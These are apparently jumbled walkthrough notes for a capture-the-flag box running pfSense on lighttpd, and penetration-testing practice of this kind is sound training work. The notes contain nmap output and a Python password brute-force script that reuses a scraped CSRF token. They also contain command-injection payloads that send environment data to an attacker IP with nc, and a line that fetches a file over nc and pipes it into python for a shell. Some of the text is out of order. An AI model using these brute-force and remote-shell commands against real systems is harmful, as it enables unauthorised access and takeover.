PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time
We find a webpage: Now copying as curl command from burpsuite after intercepting a test login:
import requests
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
re_csrf = 'csrfMagicToken = "(.*?)"'
s = requests.session()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
lines = open('passwords.txt')
for password in lines:
r = s.post('https://10.10.10.60/index.php',verify=False)
csrf = re.findall(re_csrf,r.text)[0]
login = {'__csrf_magic':csrf, 'usernamefld': 'rohit','passwordfld':password[:-1],'login':'Login'}
r = s.post('https://10.10.10.60/index.php',data=login)
if "Dashboard" in r.text:
print("Valid Login %s:%s" % ("rohit",password))
else:
print("failed %s:%s" % ("rohit",password))
s.cookies.clear()
Can use burpsuite proxy to intercept the request too.
Using exploit from github https://github.com/lawrencevanlaere/pfsense-code-exec/blob/master/pfsense_exec.py python3 pfsense_exec.py nc
Opening the rrd graph: Following the instructions and doing the following in burpsuite:
Now checking badchars with: echo+abc/|nc+10.10.14.24+1234 Now we get no output So / is a badchar. Checking env with env|nc+10.10.14.24+1234 We find that HOME is / so we can use backslash from there Now can read user.txt and root.txt
Now setting nc so that it sends the file cmd: nc -lnvp 9001 < cmd Then on burpsuite nc 10.10.14.24 9001|python& Now we get a shell:
First getting a post request in burpsuite: Now copying the required part. We need the csrfmagicktoken from the website so using ctrl+U Now writing a python script to bruteforce the password: